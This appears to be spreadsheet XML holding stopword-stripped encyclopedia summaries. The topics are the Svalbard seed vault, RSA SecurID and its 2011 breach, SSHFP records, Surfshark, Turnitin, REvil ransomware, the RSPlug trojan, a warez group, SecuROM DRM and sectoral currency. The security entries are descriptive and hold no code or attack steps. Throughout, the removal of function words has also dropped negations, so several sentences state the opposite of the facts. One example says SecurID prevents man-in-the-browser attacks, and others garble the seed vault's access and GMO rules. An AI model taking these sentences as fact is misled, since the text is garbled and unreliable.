    <t>svalbard global seed vault (norwegian: svalbard globale frøhvelv) secure backup facility world's crop diversity norwegian island spitsbergen remote arctic svalbard archipelago. seed vault provides long-term storage duplicates seeds conserved genebanks around world. this provides security world's food supply loss seeds genebanks mismanagement, accident, equipment failures, funding cuts, war, sabotage, disease natural disasters. seed vault managed terms spelled tripartite agreement among norwegian government, crop trust, nordic genetic resource center (nordgen).the norwegian government entirely funded seed vault's approximately million (us$8.8 million 2008) construction cost. norway crop trust operational costs. storing seeds vault free depositors. vault depicted several films forms, including marcus paus’ children's opera children ginko. history 1984, nordic gene bank (now nordgen) began storing backup nordic plant germplasm frozen seeds abandoned coal mine outside longyearbyen.in 2001, international treaty plant genetic resources food agriculture (itpgrfa) adopted national governments began ratify treaty soon after. treaty establishes multilateral system plant genetic resources includes providing access materials providing mechanisms resources share derived benefits.a team conservationist cary fowler, association cgiar, actively campaigned development seed vault approached norwegian government. they conducted feasibility study 2004 concurred svalbard appropriate location long-term storage.also 2004, itpgrfa entered force created legal framework international security facility. commission genetic resources food agriculture endorsed initiative october 2004 norwegian government committed fund seed vault begin construction.the seed vault officially opened february 2008, although first seeds arrived january 2008.as part seed vault's first anniversary, 90,000 food crop seed samples placed storage, bringing total number seed samples 400,000. among seeds included varieties potatoes ireland's national genebanks 20,000 samples u.s. agricultural research service. other seed samples came genebanks canada switzerland well international genebanks colombia, mexico syria. this (3.9-long-ton; 4.4-short-ton) shipment brought total number seeds stored seed vault million. anniversary, seed vault contained samples approximately one-third world's important food crop varieties. also part anniversary, experts food production climate change three-day conference longyearbyen.japanese sculptor mitsuaki tanabe presented work seed vault named "the seed 2009 momi in-situ conservation".in 2010, delegation seven u.s. congressmen handed number different varieties chili pepper.by 2013, approximately one-third genera diversity stored genebanks globally represented seed vault.in october 2016, seed vault experienced unusually large degree water intrusion higher average temperatures heavy rainfall. while common water seep seed vault's (328 entrance tunnel warmer spring months, case water encroached tunnel freezing. seed vault designed water intrusion seeds risk. result, however, norwegian public works agency statsbygg completed improvements tunnel 2019 prevent intrusion future, including waterproofing tunnel walls, removing heat sources tunnel, digging exterior drainage ditches.for seed vault's 10th anniversary february 2018, shipment 70,000 samples delivered facility, bringing number samples received million (not counting withdrawals).according independent, march 2020, covid-19 pandemic pose risk vault permanent staff svalbard facility."as june 2021, seed vault conserves 1,081,026 distinct crop samples, representing 13,000 years agricultural history.in 2019, seed vault cost million (us$282,000) maintain. construction norway, sweden, finland, denmark, iceland's prime ministers ceremonially laid "the first stone" june 2006.the seed bank (390 inside sandstone mountain spitsbergen island, employs robust security systems. facility managed nordic genetic resource center, though permanent staff on-site. spitsbergen considered ideal lacked tectonic activity permafrost, aids preservation. (430 level keep site even caps melt. locally mined coal provides power refrigeration units cool seeds internationally recommended standard (−0.4 °f). equipment fails, least several weeks elapse facility rises surrounding sandstone bedrock's temperature °f), estimated take centuries warm °f).a feasibility study prior construction determined seed vault could preserve major food crops' seeds hundreds years. some, including important grains, could potentially remain viable thousands years.running length facility's roof front face entryway illuminated artwork named perpetual repercussion norwegian artist dyveke sanne marks location vault distance. norway, government-funded construction projects exceeding certain cost must include artwork. koro, norwegian state agency overseeing public spaces, engaged artist propose artwork seed vault. roof vault entrance filled highly reflective stainless steel, mirrors, prisms. installation reflects polar light summer months, winter, network fibre-optic cables gives piece muted greenish-turquoise white light. mission seed vault's mission provide backup accidental loss diversity traditional genebanks. while popular press emphasized possible utility event major regional global catastrophe, seed vault frequently accessed genebanks lose samples mismanagement, accident, equipment failures, funding cuts, natural disasters. these events occur regularity. civil strife history destroying genebanks. national genebank philippines damaged flooding later destroyed fire, genebanks afghanistan iraq lost completely, international genebank syria became unavailable. according economist, "the svalbard vault backup world's 1,750 seed banks, storehouses agricultural biodiversity."norwegian prohibited storing genetically modified seeds vault.the adjacent arctic world archive provides similar service data, etched code reels film. project lead piql norway states film, properly preserved, last 1,000 years. tripartite agreement seed vault managed terms spelled tripartite agreement among norwegian government, crop trust, nordic genetic resource center (nordgen). kingdom norway owns seed vault. crop trust provides funding ongoing operations provides financial assistance depositors preparation shipments. nordgen operates seed vault maintains public database deposits.an international advisory council provides guidance advice. includes representatives fao, cgiar, international treaty plant genetic resources institutions. access seeds vault seed samples copies samples stored depositing genebanks. researchers, plant breeders, groups wishing access seed samples cannot seed vault; must instead request samples depositing genebanks. samples stored genebanks will, cases, accessible accordance terms conditions international treaty plant genetic resources food agriculture, approved countries parties.the seed vault functions like safe deposit bank. bank owns building depositor owns contents box. government norway owns facility depositing genebanks seeds send. deposit samples svalbard constitute legal transfer genetic resources. genebank terminology called "black box" arrangement. each depositor signs deposit agreement nordgen, acting behalf norway. agreement makes clear norway claim ownership deposited samples ownership remains depositor, sole right access materials seed vault. access anyone else's seeds seed vault. database samples depositors maintained nordgen.the syrian civil created situation black arrangement demonstrated. result conflict, international center agricultural research areas (icarda) unable maintain genebank located hadya, syria therefore unable distribute samples. 2015, icarda withdrew backup samples stored seed vault could regenerate seeds. icarda made second larger withdrawal 2017. these seeds planted fields lebanon morocco multiplied. some returned seed vault others added icarda's genebanks lebanon morocco could conserved distributed. these withdrawals seed vault june 2021. seed storage seeds stored sealed three-ply foil packages placed plastic tote containers metal shelving racks. storage rooms kept (−0.4 °f). temperature limited access oxygen ensure metabolic activity delay seed ageing. permafrost surrounding facility help maintain temperature seeds electricity supply fails.initially seed vault would minor water intrusion entrance annual spring permafrost thawing. warmer temperatures heavy rainfall october 2016 caused significantly greater amounts water seep entrance, facility's design ensured water froze several meters seeds endangered. work completed 2019 eliminated water seepage.attached seed boxes type nanofilm hold information seed identity valuable information. crop trust crop trust, officially known global crop diversity trust, plays role planning seed vault coordinating shipments seed samples seed vault conjunction nordic genetic resource center. crop trust provides annual operating costs facility aside endowment fund norwegian government finances upkeep structure itself. with support donors, crop trust assists selected genebanks developing countries well international agricultural research centres packaging shipping seeds seed vault. awards honors svalbard global seed vault ranked time's best inventions 2008. awarded norwegian lighting prize 2009. ranked 10th influential project past years project management institute. capacity seeds stored airtight aluminium bags. number seeds vary depending size seed, average contain approximately seeds. facility storage capacity million seed samples.the table presents cumulative total samples (i.e. accessions) deposited year. depositors june 2021, depositors safeguard crop samples seed vault. table lists international genebanks followed regional national genebank terms number samples currently deposited seed vault. indigenous communities depositors seed vault limited international, regional national genebanks. some indigenous communities deposited seeds safety duplication seed vault. 2015, representatives parque papa peru deposited samples potatoes. 2020, cherokee nation became first tribe deposit safeguarded nine samples heirloom food crops predate european colonization. cultural depictions seed vault inspiration ibsen international's project "the seed", supported norwegian government. children's opera children ginko (norwegian: frøbarna) marcus paus, aimed raise ecological awareness, "reveal power nature celebrate children's courage growing up", created part project. seed vault featured "the futurama holiday spectacular" aired november 2010.the seed vault featured second season belgian netflix series into night first season turkish spin-off, netflix series yakamoz s-245, based novel "the axolotl" jacek dukaj.in season 2016 macgyver "seeds permafrost feather" team head greenland, working highly secure international seed vault vanished without trace. upon arrival, team finds dead body packet seeds missing north korean crate, seeds whose plant synthesized deadly poison. season series scorpion, titled "dirty seeds, done dirt cheap," protagonists travel greenland simple job, repairing malfunctioning system granse world seed vault. bobiverse books dennis taylor seed vault improved svalbard global trust, also genetic material earth animals, critical attempts move humans colonies planets. science fiction author stephen baxter used seed vault, described "svalbard vault", novels flood ark. vault first purchased millionaire world floods, cached aboard starship take earth life worlds. also arctic policy norway arctic world archive australian grains genebank center origin frozen zoo, similar concept, animals national core laboratory amphibian coral reef organizations rosetta project indian seed vault millennium seed bank partnership orthodox seed recalcitrant seed survivalism references external links official website svalbard global seed vault norwegian ministry agriculture food svalbard global seed vault crop trust svalbard global seed vault nordic genetic resource center (nordgen) online searchable database deposits nordgen "inside svalbard seed vault" youtube</t>
  </si>
  <si>
    <t>RSA SecurID</t>
  </si>
  <si>
    <t>securid, formerly referred securid, mechanism developed performing two-factor authentication user network resource. description securid authentication mechanism consists "token"—either hardware (e.g. fob) software soft token)—which assigned computer user creates authentication code fixed intervals (usually seconds) using built-in clock card's factory-encoded almost random (known "seed"). seed different token, loaded corresponding securid server (rsa authentication manager, formerly ace/server) tokens purchased. on-demand tokens also available, provide tokencode email delivery, eliminating need provision token user. token hardware designed tamper-resistant deter reverse engineering. when software implementations algorithm ("software tokens") appeared market, public code developed security community allowing user emulate securid software, access current securid code, original 64-bit securid seed file introduced server. later, 128-bit securid algorithm published part open source library. securid authentication scheme, seed record secret used generate one-time passwords. newer versions also feature connector, allows token used smart card-like device securely storing certificates.a user authenticating network resource—say, dial-in server firewall—needs enter personal identification number number displayed moment securid token. though increasingly rare, systems using securid disregard implementation altogether, rely password/rsa securid code combinations. server, also real-time clock database valid cards associated seed records, authenticates user computing number token supposed showing moment time checking user entered. older versions securid, "duress pin" used—an alternate code creates security event showing user forced enter pin, still providing transparent authentication. using duress would allow successful authentication, token automatically disabled. "duress pin" feature deprecated available currently supported versions. while securid system adds layer security network, difficulty occur authentication server's clock becomes sync clock built authentication tokens. normal token clock drift accounted automatically server adjusting stored "drift" value time. sync condition result normal hardware token clock drift, correcting synchronization authentication manager server clock sync token tokens) accomplished several different ways. server clock drifted administrator made change system clock, tokens either resynchronized one-by-one, stored drift values adjusted manually. drift done individual tokens bulk using command line utility. security pushed forth initiative called "ubiquitous authentication", partnering device manufacturers ironkey, sandisk, motorola, freescale semiconductor, redcannon, broadcom, blackberry embed securid software everyday devices flash drives cell phones, reduce cost number objects user must carry. theoretical vulnerabilities token codes easily stolen, mutual-authentication exists (anything steal password also steal token code). this significant, since principal threat users believe solving technology. simplest practical vulnerability password container losing special device activated smart phone integrated function. such vulnerability cannot healed single token container device within preset time span activation. consideration presumes loss prevention, e.g. additional electronic leash body sensor alarm. while securid tokens offer level protection password replay attacks, designed offer protection middle type attacks used alone. attacker manages block authorized user authenticating server next token code valid, able server. risk-based analytics (rba), feature latest version (8.0) provides significant protection type attack user enabled authenticating agent enabled rba. securid prevent browser (mitb) based attacks. securid authentication server tries prevent password sniffing simultaneous login declining authentication requests, valid credentials presented within given time frame. this documented unverified post john brainard. attacker removes user ability authenticate however, securid server assume user actually authenticating hence allow attacker's authentication through. under attack model, system security improved using encryption/authentication mechanisms ssl. although soft tokens convenient, critics indicate tamper-resistant property hard tokens unmatched soft token implementations, could allow seed record secret keys duplicated user impersonation occur. hard tokens, hand, physically stolen acquired social engineering) users. small form factor makes hard token theft much viable laptop/desktop scanning. user typically wait reporting device missing, giving attacker plenty time breach unprotected system. this could occur, however, users userid also known. risk-based analytics provide additional protection lost stolen tokens, even users userid known attackers. batteries flat periodically, requiring complicated replacement re-enrollment procedures. reception competing products 2003, securid commanded two-factor authentication market million devices produced date. number competitors, vasco, make similar security tokens, mostly based open oath hotp standard. study published gartner 2010 mentions oath securid competitors.other network authentication systems, opie s/key (sometimes generally known otp, s/key trademark telcordia technologies, formerly bellcore) attempt provide "something have" level authentication without requiring hardware token. march 2011 system compromise march 2011, announced victims extremely sophisticated cyber attack". concerns raised specifically reference securid system, saying "this information could potentially used reduce effectiveness current two-factor authentication implementation". however, formal form submission indicated believe breach would "material impact financial results". breach cost emc, parent company rsa, $66.3 million, taken charge second quarter earnings. covered costs investigate attack, harden systems monitor transactions corporate customers, according executive vice president chief financial officer david goulden, conference call analysts.the breach rsa's network carried hackers sent phishing emails targeted, small groups employees rsa. attached email microsoft excel file containing malware. when employee opened excel file, malware exploited vulnerability adobe flash. exploit allowed hackers poison gain control machines access servers rsa's network.there hints breach involved theft rsa's database mapping token serial numbers secret token "seeds" injected make unique. reports executives telling customers "ensure protect serial numbers tokens" lend credibility hypothesis. barring fatal weakness cryptographic implementation token code generation algorithm (which unlikely, since involves simple direct application extensively scrutinized aes-128 block cipher), circumstance attacker could mount successful attack without physical possession token token seed records leaked. stated release details extent attack give potential attackers information could figuring attack system.on june 2011, offered token replacements free security monitoring services 30,000 securid customers, following attempted cyber breach defense customer lockheed martin appeared related securid information stolen rsa. spite resulting attack defense customers, company chairman coviello said believe still believe customers protected". resulting attacks april 2011, unconfirmed rumors cited communications attacked result compromise.in 2011, information used attack lockheed martin systems. however lockheed martin claims "aggressive actions" company's information security team, customer, program employee personal data" compromised "significant tenacious attack". department homeland security defense department offered help determine scope attack. references external links official securid websitetechnical detailssample securid token emulator token secret import i.c.wiener, bugtraq post. apparent weaknesses security dynamics client/server protocol adam shostack, 1996. usenet thread discussing securid details mclellan, al., comp.security.misc. unofficial securid information reverse-engineering attempts yahoo groups securid-users. analysis possible risks 2011 compromisepublished attacks securid hash functioncryptanalysis alleged securid hash function (pdf) alex biryukov, joseph lano, bart preneel. improved cryptanalysis securid (pdf) scott contini yiqun lisa yin. fast software-based attacks securid (pdf) scott contini yiqun lisa yin.</t>
  </si>
  <si>
    <t>SSHFP record</t>
  </si>
  <si>
    <t>secure shell fingerprint record (abbreviated sshfp record) type resource record domain name system (dns) identifies keys associated host name. acquisition sshfp record needs secured mechanism dnssec chain trust established. structure ⟨name⟩ [⟨ttl⟩] [⟨class⟩] sshfp ⟨algorithm⟩ ⟨type⟩ ⟨fingerprint⟩ ⟨name⟩ name object resource record belongs (optional) ⟨ttl⟩ time live seconds). validity resource records (optional) ⟨class⟩ protocol group resource record belongs (optional) ⟨algorithm⟩ algorithm reserved; rsa; dsa, ecdsa; ed25519 6:ed448;) ⟨type⟩ algorithm used hash public reserved; sha-1; sha-256) ⟨fingerprint⟩ hexadecimal representation hash result, text example host.example.com. sshfp 123456789abcdef67890123456789abcdef67890 example, host domain name host.example.com uses sha-1 fingerprint 123456789abcdef67890123456789abcdef67890. with openssh suite, ssh-keyscan utility used determine fingerprint host's key; using print sshfp record directly. also list record types references</t>
  </si>
  <si>
    <t>Surfshark</t>
  </si>
  <si>
    <t>surfshark service company located netherlands. subsidiary nord security, parent company nordvpn. surfshark offers products virtual private network (vpn) service, data leak detection system, private search tool. history surfshark launched 2018 introducing first application devices. 2018, surfshark underwent external audit german cybersecurity firm cure53, browser extensions. surfshark 3,200+ servers countries. surfshark's founding opaque company first headquartered british virgin islands. because publicly disclosed employees surfshark, including ceo, lithuanian names, fair assume operation ties baltic region. this theory supported surfshark's parent company nord security received funding lithuanian startup accelerator office located lithuania.in september 2019, surfshark launched android called trust dns. works resolver provide access websites highly restrictive countries. october 2019, surfshark became first packages receive official seal approval granted independent it-security institute av-test. 2020, surfshark named best 2020 cnn.in mid-2021, surfshark began process merge competitor nord security, parent company popular nordvpn. merger finalised early 2022, brands continuing operate independently. 2022, surfshark closed physical servers india response cert-in's order companies store consumers’ personal data period five years. surfshark included cnet's 2022 best overall list. technology december 2019, surfshark implemented gps-spoofing android, allowing users hide device’s physical geo-location changing server’s locations. applications, surfshark uses ikev2, openvpn wireguard tunneling protocols. data transferred surfshark servers encrypted using aes-256-gcm encryption standard.in july 2020, surfshark announced entire server network running ram-only servers. october 2021, surfshark announced would relocating british virgin islands netherlands, primarily business reasons. august 2022, surfshark exclusively partnered digital rights watchdog netblocks greater reporting internet shutdowns.surfshark service features include: kill switch, multihop, bypasser. also offers malware prevention feature cleanweb blocks level. double multihop feature routes traffic servers instead one, thereby providing better security. surfshark's bypasser split tunneling feature. references</t>
  </si>
  <si>
    <t>Turnitin</t>
  </si>
  <si>
    <t>turnitin (stylized turnitin) internet-based plagiarism detection service american company turnitin, llc, subsidiary advance publications. founded 1998, sells licenses universities high schools software service (saas) website check submitted documents database content websites identifying plagiarism. results identify similarities existing sources also used formative assessment help students learn avoid plagiarism improve writing.students required submit work turnitin requirement taking certain course class. software source controversy, students refusing submit, arguing requiring submission implies presumption guilt. some critics alleged proprietary software violates educational privacy well international intellectual-property laws, exploits students' works commercial purposes permanently storing turnitin's privately held database.turnitin, also runs informational website plagiarism.org offers similar plagiarism-detection service newspaper editors book magazine publishers called ithenticate. other tools included turnitin suite grademark (online grading corrective feedback) peermark (student peer-review service). march 2019, advance publications acquired turnitin, us$1.75 billion.in service supported promoted jisc 'plagiarism detection service turnitin uk'. service operated iparadigms, conjunction northumbria learning, european reseller service. functionality turnitin software checks potentially unoriginal content comparing submitted papers several databases using proprietary algorithm. scans databases also licensing agreements large academic proprietary databases. student-paper database essays submitted students stored database used check plagiarism. this prevents student using another student's paper, identifying matching text papers. addition student papers, database contains copy publicly accessible internet, company using crawler continually content turnitin's archive. also contains commercial and/or copyrighted pages books, newspapers, journals. classroom integration students typically upload papers directly service teachers access. teachers also submit student's papers turnitin.com individual files, bulk upload, file. teachers also assignment-analysis options students review system's "originality reports" finalize submission. peer-review option also available. some virtual learning environments configured support turnitin, student assignments automatically submitted analysis. blackboard, moodle, angel, instructure, desire2learn, pearson learning studio, sakai, studywiz integrate software. admissions applications 2019, turnitin began analyzing admissions application materials partner software, kira talent. reception privacy student union dalhousie university criticized turnitin canadian universities american government able access submitted papers personal information database patriot act. mount saint vincent university became first canadian university turnitin's service partly implications act. copyright-violation concerns lawyers company claim student work covered theory implied license evaluate, since would pointless write essays meant graded. that implied license, lawyers argue, thus grants turnitin permission copy, reproduce preserve works. company's lawyers claim dissertations theses also carry implied permission archive publicly accessible collection university library.university minnesota school professor burk countered company's papers meet fair-use test several reasons: company copies entire paper, portion students' work often original, interpretive creative rather compilation established facts turnitin commercial enterprisewhen group students filed suit turnitin basis, vanderhye iparadigms llc, district court found practice fell within fair use; appeal, united states court appeals fourth circuit affirmed. presumption guilt some students argue requiring submit papers turnitin creates presumption guilt, violate scholastic disciplinary codes applicable local laws judicial practice. some teachers professors support argument attempting discourage schools using turnitin. writecheck iparadigms, company used behind turnitin, another commercial website called writecheck, students paid paper tested database used turnitin, determine whether paper would detected plagiarism student submitted paper main turnitin website account provided school. announced writecheck product withdrawn 2020 subscriptions accepted november 2019. economist alex tabarrok complained turnitin's systems "are warlords arming sides plagiarism war". website subsequently shut down. litigation well-publicized dispute mandatory turnitin submissions, jesse rosenfeld, student mcgill university declined, 2004, submit academic work turnitin. university senate eventually ruled rosenfeld's assignments graded without using service. following year, another mcgill student, denise brunsdon, refused submit assignment turnitin.com similar ruling senate committee student grievances.in 2006, senate mount saint vincent university nova scotia prohibited submission students' academic work turnitin.com software requires students' work become part external database parties might access this decision granted students' union alerted university community legal privacy concerns associated turnitin.com anti-plagiarism devices profit students' academic work. this first campus-wide kind canada, following decisions princeton, harvard, yale stanford turnitin.at ryerson university toronto, students decide whether submit work turnitin.com make alternate arrangements instructor. similar policies place brock university saint catharines.on march 2007, help intellectual property attorney, students mclean high school virginia (with assistance committee students' rights) students attending desert vista high school phoenix, arizona, filed suit united states circuit court (eastern district, alexandria division) alleging copyright infringement iparadigms, turnitin's parent company. nearly year later, judge claude hilton granted summary judgment students' complaint favor iparadigms/turnitin, accepted click-wrap agreement turnitin website. students appealed ruling, april 2009, united states court appeals fourth circuit affirmed judge hilton's judgment favor iparadigms/turnitin. flaws encodings, fonts text representation several flaws bugs turnitin plagiarism detection software documented scientific literature. particular, turnitin proven vulnerable text encodings, rearranged glyphs computer font, text replaced bézier curves representing shape. automated paraphrasing another study showed turnitin failed detect text produced popular free internet-based paraphrasing tools. besides, sophisticated machine learning techniques, automated paraphrasing, produce natural expressive text, virtually impossible turnitin detect. also, article spinning recognized turnitin. asked situation, vice president marketing turnitin chris harrick said company "working solution", "not concern" opinion "the quality tools pretty poor". turnitin's response several years later, turnitin published article titled "can students trick turnitin? some students believe 'beat' turnitin employing various tactics". company denied technical issues said "the authors 'tricks' mostly essay mills." article listed possible "tricks" turnitin intended take care them, without mentioning scientific literature, technical treatises examples computer code. further criticism italian scholar michele cortelazzo, full professor linguistics, also studies copyright attribution similarity texts, noted that, paradoxically, impossible tell turnitin's source code plagiarized sources, open source. reason, unknown scientific methodologies, any, turnitin uses assess papers.in 2009, group researchers texas tech university reported many instances "non-originality" turnitin finds plagiarism, jargon, course terms phrases appeared legitimate reasons. example, researchers found high percentages flagged material topic terms papers (e.g. "global warming") "topic phrases", defined paper topic words added (e.g. "the prevalence childhood obesity continues rise").turnitin also criticized paying panelists conferences education writing. also ithenticate references external links official website</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>revil (ransomware evil; also known sodinokibi) russia-based russian-speaking private ransomware-as-a-service (raas) operation. after attack, revil would threaten publish information page happy blog unless ransom received. high profile case, revil attacked supplier tech giant apple stole confidential schematics upcoming products. january 2022, russian federal security service said dismantled revil charged several members. history revil recruits affiliates distribute ransomware them. part arrangement, affiliates ransomware developers split revenue generated ransom payments. difficult pinpoint exact location, thought based russia fact group target russian organizations, former soviet-bloc countries.ransomware code used revil resembles code used darkside, different hacking group; revil's code publicly available, suggesting darkside offshoot revil partner revil. revil darkside similarly structured ransom notes code check victim located commonwealth independent states (cis) country.cybersecurity experts believe revil offshoot previous notorious, now-defunct hacker gang, gandcrab. this suspected fact revil first became active directly gandcrab shutdown, ransomware share significant amount code. 2020 part criminal cybergang's operations, known stealing nearly terabyte information firm grubman shire meiselas sacks demanding ransom publish group attempted extort companies public figures well. 2020 demanded million president donald trump. group claimed done deciphering elliptic-curve cryptography firm used protect data. according interview alleged member, found buyer trump information, cannot confirmed. interview, member claimed would bring $100 million ransoms 2020. 2020, group released legal documents totaling size related singer lady gaga. following day, released "harmless" e-mails referred donald trump contained word 'trump'.they planning selling madonna's information, eventually reneged. 2021 march march 2021, revil attacked harris federation published multiple financial documents federation blog. result, systems federation shut weeks, affecting 37,000 students.on march 2021, revil affiliate claimed data leak site downloaded data multinational hardware electronics corporation acer, well installing ransomware, linked 2021 microsoft exchange server data breach cybersecurity firm advanced intel, found first signs acer servers targeted march 2021. us$50 million ransom demanded decrypt undisclosed number systems downloaded files deleted, increasing us$100 million paid march 2021. april april 2021, revil stole plans upcoming apple products quanta computer, including purported plans apple laptops apple watch. revil threatened release plans publicly unless receive million. 2021, s.a. attacked ransomware forced temporary shutdown company’s u.s. beef plants disrupted operations poultry pork plants. days later, white house announced revil responsible s.a. cyberattack. confirmed connection follow-up statement twitter. paid million ransom bitcoin revil. june june 2021, invenergy reported attacked ransomware. later, revil claimed responsible. july july 2021, hundreds managed service providers revil ransomware dropped systems kaseya desktop management software. revil demanded million restore encrypted data. consequence swedish coop grocery store chain forced close stores several days.on july 2021, revil hacked computers florida-based space weapon-launch technology contractor hx5, counts army, navy, force, nasa among clients, publicly releasing stolen documents happy blog. york times judged documents "vital consequence".after july phone call united states president biden russian president vladimir putin, biden told press, made clear united states expects ransomware operation coming soil even though it’s sponsored state, expect give enough information is." biden later added united states would take group's servers putin not.on july 2021, revil websites infrastructure vanished internet. politico cited unnamed senior administration official stating know exactly they've [revil] stood down;" official also discount possibility russia shut group forced shut down.on july 2021, kaseya announced received decryption files encrypted july kaseya ransomware attack unnamed "trusted third party", later discovered withheld three weeks, helping victims restore files. withheld avoid tipping revil effort take servers, ultimately proved unnecessary hackers went offline without intervention. september september 2021, romanian cybersecurity firm bitdefender published free universal decryptor utility help victims revil/sodinokibi ransomware recover encrypted files, encrypted july 2021. from september early november, decryptor used 1,400 companies avoid paying $550 million ransom allow recover files.on september 2021, malware researchers identified backdoor built revil malware allowed original gang members conduct double-chats cheat affiliates ransomware payments. ransomware affiliates cheated reportedly posted claims "hacker's court", undermining trust revil affiliates. newer versions revil malware reportedly backdoor removed. october october 2021, revil servers hacked multi-country operation forced offline. vmware's head cybersecurity strategy said "the fbi, conjunction cyber command, secret service like-minded countries, truly engaged significant disruptive actions groups,”. revil gang member attempted restore servers backups also compromised. investigations criminal charges part operation golddust involving countries, europol, eurojust interpol, enforcement authorities arrested five individuals tied sodinokibi/revil suspects connected gandcrab ransomware. they allegedly responsible 5000 infections, collected half million euros ransomware payments.on november 2021, united states department justice unsealed indictments ukrainian national yaroslav vasinskyi russian national yevgeniy polyanin. vasinskyi charged conducting ransomware attacks multiple victims including kaseya, arrested poland october. polyanin charged conducting ransomware attacks multiple victims including texas businesses government entities. department worked national police ukraine charges, also announced seizure $6.1 million tied ransomware payments. convicted charges, vasinskyi faces maximum penalty years prison, polyanin years prison.in january 2022, russian federal security service said dismantled revil charged several members provided information references</t>
  </si>
  <si>
    <t>RSPlug</t>
  </si>
  <si>
    <t>rsplug trojan horse, form dnschanger, malware targeting operating system. first incarnation trojan, osx.rsplug.a, discovered october 2007 security researchers intego. variants several variants rsplug trojan found primarily pornographic sites disguised video codecs, variants spotted sites offering game downloads. when osx.rsplug.a installed, system's settings changed redirect browsing phishing sites, pages displaying pornographic sites.there also version osx.rsplug trojan targets windows platform, version technical manager f-secure suggest group behind dns-changing trojan group behind zlob trojan. however, intego noted behind rsplug trojan horse stopped activities controlling windows malware, likely people. isolation part operation ghost click, november 2009 brought sophisticated internet fraud ring infected millions computers worldwide virus enabled thieves manipulate multi-billion-dollar internet advertising industry." estimated four million computers countries infected dnschanger. variant dnschanger rsplug trojan horse, spawned number variants infected many macs. also defender trojan.win32.dnschanger references</t>
  </si>
  <si>
    <t>Rabid Neurosis</t>
  </si>
  <si>
    <t>rabid neurosis (rns) warez release organization founded 1996, following footsteps compress audio (cda), first piracy group. 1999, group claimed released 6,000 titles year. occasionally used tagline "rabid neurosis spread epidemic." best known releasing highly anticipated albums hop, pop, rock dance artists weeks sometimes months official release date. known greatly contributed scene. their last release fall boy's infinity high january 2007.on september 2009, four members defunct group indicted united states department justice conspiracy commit copyright infringement. they included adil cassim (who used handle 'kali' later 'blazini'), matthew chow ('rl'), bennie glover ('adeg') edward mohan ('mistaed'). adil cassim took leadership group 2000 departure former leader 'al_capone', previously member warez groups merged rns. march 2010, matthew chow, identified member group, found guilty conspiracy commit criminal infringement. federal authorities charged chow single count conspiracy commit copyright infringement, carries maximum sentence five years prison $250,000 fine. five members rns, adil cassim california also found guilty. four members pleaded guilty copyright infringement. also music free warez scene warez group topsite (warez) standard (warez) references further reading stephen witt (2015-06-16). music free: industry, turn century, patient zero piracy. viking. isbn 978-0525426615. external links archive official website</t>
  </si>
  <si>
    <t>SecuROM</t>
  </si>
  <si>
    <t>securom cd/dvd copy protection digital rights management (drm) product developed sony dadc. aims prevent unauthorised copying reverse engineering software, primarily commercial computer games running microsoft windows. method disc protection later versions data position measurement, used conjunction online activation drm. securom gained prominence late 2000s generated controversy requirement frequent online authentication strict activation limits. 2008 class-action lawsuit filed electronic arts securom video game spore. opponents, including electronic frontier foundation, believe fair-use rights restricted applications securom. software securom limits number activated time uninstalled upon removal game. securom first version include securom removal tool, intended help users remove securom software installed removed. most titles also include revoke tool deactivate license; revoking licenses would restore original activation limit. windows activation, hardware change appear change computer, force another activation software. reformatting computer consume activation, product activation servers successfully detect re-installation hardware. activation limit increased, case-by-case basis, user shown reached limit several hardware-triggered re-activations known problems securom detect original game disc drive. this occur virtually configuration, reinserting disc rebooting computer usually resolves problem. under windows vista, securom prevent game running explicit congestion notification enabled vista's networking configuration. software used bypass copy protection, disk drive emulators debugging software, block launch game generate security module error. disabling software usually fixes issue, cases uninstallation required. securom conflicts software, best-known sysinternals' process explorer (prior version 11). process explorer attempt protected software would produce error caused driver kept memory process explorer closed. this solved either ensuring process explorer running background game launched, updating process explorer. securom hardware-level incompatibility certain brands optical drives. workarounds exist. controversies bioshock purchasers bioshock required activate game online, users exceeded permitted activations would call limit raised. limit raised five activations incorrect phone number printed manual, call centers outside united states. separate activations required user machine. games removed activation limit 2008, although online activation still required. game available completely drm-free. mass effect announced 2008 mass effect would securom require software reactivated every days. customer complaints remove 10-day activation, securom remained tied installation, product activation facility used impose limit three activations. call customer support required reset activation limit. unlike bioshock, uninstalling game refund previously used activation. de-authorization tool released main game, ea's customer support must still contacted deactivate downloadable expansions. spore spore, released september 2008, uses securom. spore seen relatively substantial rates unauthorized distribution among peer-to-peer groups, reported million downloads bittorrent networks, user-redistributed game 2008, according torrentfreak's "top pirated games 2008" list. journalists note reaction users unhappy copy protection.ea requires player authenticate game online upon installation. this system announced ea's originally planned system, would required authentication every days, opposition public. each individual product game would limited three computers. this limit raised five computers, response customer complaints, online user (required access user-generated content) created copy. class-action lawsuit filed maryland resident melissa thomas within u.s. district court electronic arts securom's inclusion spore. several lawsuits followed. command conquer: alert alert included securom february 2009, removed steam version. non-steam editions still include securom. despite this, every serial activated times, activations could revoked individual systems game's auto-run feature patch 1.05. dragon reports emerged march 2011 ea's dragon included securom, despite assertions contrary. march 2011, bioware representative stated official dragon message boards game securom, instead release control product made team, completely different product" later revealed sony release control. consumer advocacy group reclaim your game challenged claim, based analysis files question. final fantasy re-release early august 2012 updated version final fantasy re-released updated version included securom software, discovered early purchase link included square enix store. users purchased downloaded game unable activate game activation servers recognizing activation purchased games. sims ultimate collection released sims ultimate collection free download july 2014, mention download also came securom included, later revealed site reclaim your game. securom removed november 2017, three years last offered origin. tron: evolution 2019, disney's decision securom license, tron: evolution, relies authenticate installation startup, rendered unplayable pulled steam store nearly decade release. disney claims efforts made re-release game without securom, assurance timetable action. also cd-cops denuvo digital rights management don't copy that floppy extended copy protection safedisc sony copy prevention scandal tagès references external links official website sony dadc tweakguide's analysis securom controversy</t>
  </si>
  <si>
    <t>Sectoral currency</t>
  </si>
  <si>
    <t>sectoral currency form complementary currency restricted specific sector. examples sectoral currency saber, restricted educational sector thus used education, fureai kippu, restricted health care sector. sectoral currencies make people provide type services require intend future, means people collectively intelligent currency generally redeemable.</t>
  </si>
  <si>
    <t>Tuxissa</t>
  </si>
  <si>
